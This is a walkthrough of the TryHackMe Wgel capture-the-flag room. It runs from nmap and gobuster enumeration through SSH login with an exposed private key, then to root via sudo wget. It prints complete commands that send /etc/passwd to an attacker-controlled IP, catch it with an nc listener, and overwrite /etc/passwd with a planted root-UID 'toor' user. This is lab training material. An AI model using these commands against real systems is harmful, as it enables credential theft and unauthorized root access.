THM ROOM: Wgel CTF Walkthrough

Welcome to the Wgel TryHackMe room! In this blog post, we’ll walk through the step-by-step process of gaining root access to the target machine. Let’s get started!

TryHackMe Challenge Link: https://tryhackme.com/room/wgelctf

Reconnaissance — Nmap Scan:

The first step in any hacking endeavor is reconnaissance. We initiated an Nmap scan with the following command to identify open ports and services on the target machine

sudo nmap -sV -sS -A <IP>

Nmap Scan

Our scan revealed two open ports:

• Port 22 (SSH) running OpenSSH 7.2p2 on Ubuntu.
• Port 80 (HTTP) hosting an Apache web server on Ubuntu.

Directory Enumeration:

gobuster dir -u http://<IP>/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20

Initial Directory Enum

Our initial scan led us to a directory named “/sitemap,” which immediately caught our attention. We proceeded to enumerate the contents of this directory

gobuster dir -u http://<IP>/sitemap/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20

We discovered a directory “.ssh” via enumeration, and while exploring the directory, I discovered a file named “id_rsa.” This is a significant discovery as it could potentially provide us with SSH access.

Directory Enum on /sitemap

SSH Directory

The id_rsa file contains a private key, which is a password for accessing SSH; despite this, we do not know the username. After some digging, I discovered something interesting in the source code of Apache’s default webpage.

Possible Username

Initial Foothold — SSH Access:

ssh -i id_rsa jessie@<IP>

Our SSH connection was successful, granting us initial access to the system. However, the real challenge was yet to come.

Exploring further we found user flag.

User Flag

Privilege Escalation:

Now that we had access as the user “jessie,” our next goal was to escalate privileges to root.

I checked sudo -l and discovered that the wget program can be launched as root, making it a possible attack vector for privilege escalation.

Sudo -l output

There are various ways to priv esc from wget, but here is the simplest.

Here are the steps I took to gain root access:

• We leveraged the “sudo /usr/bin/wget” command to download a file, in this case, the “/etc/passwd” file, to our own server. (TUN0_IP = Kali_Linux_IP)

sudo /usr/bin/wget --post-file=/etc/passwd http://<YOUR_TUN0_IP>:5555

• We listened for incoming connections and captured the “/etc/passwd” file.

nc -lvnp 5555

• We added a new user to the “/etc/passwd” file with root privileges.

echo "toor:`openssl passwd toor`:0:0:root:/root:/bin/bash" >> passwd

• We hosted the modified “/etc/passwd” file on a local HTTP server.

python3 -m http.server

• We used “wget” to retrieve the hosted “/etc/passwd” file, effectively creating a new user with root access.

sudo /usr/bin/wget http://<YOUR_TUN0_IP>:8000/passwd -O /etc/passwd

• Finally, we switched to the newly created user and gained root access to the system. username: toor, password: toor

su toor

# will ask for password
# Password is toor

Here’s a short video to help you understand.

Priv Escalation

Retrieving Flags:

With root access secured, we were able to retrieve both the user and root flags.

• The user flag was located in the “/home/jessie/Documents/user_flag.txt” file.
• The root flag was stored in the “/root/root_flag.txt” file.